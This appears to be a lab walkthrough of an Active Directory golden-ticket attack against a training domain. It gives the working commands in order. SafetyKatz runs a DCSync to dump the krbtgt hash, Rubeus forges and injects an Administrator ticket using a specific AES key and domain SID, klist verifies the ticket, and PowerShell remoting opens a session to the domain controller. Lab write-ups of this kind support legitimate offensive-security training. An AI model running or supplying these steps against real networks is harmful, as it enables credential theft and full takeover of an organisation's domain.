Let’s Extract the Krbtgt Hash

.\\SafetyKatz.exe "lsadump::dcsync /user:us\\krbtgt /domain:us.techcorp.local"

Now let’s forge a ticket for the administrator user

.\\Rubeus.exe golden /user:Administrator /domain:us.techcorp.local /aes256:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5 /sid:S-1-5-21-210670787-2521448726-163245708 /ldap /printcmd

Let’s copy this command and try it

C:\\AD\\Tools\\Rubeus.exe golden /aes256:5E3D2096ABB01469A3B0350962B0C65CEDBBC611C5EAC6F3EF6FC1FFA58CACD5 /user:Administrator /id:500 /pgid:513 /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /pwdlastset:"7/5/2019 12:42:09 AM" /minpassage:1 /badpwdcount:2 /logoncount:755 /netbios:US /groups:544,512,520,513 /dc:US-DC.us.techcorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt

Now let’s list the tickets

klist

As we see we have a ticket for the administrator

Let’s PS-Remote to the US-DC

Enter-PSSession -ComputerName us-dc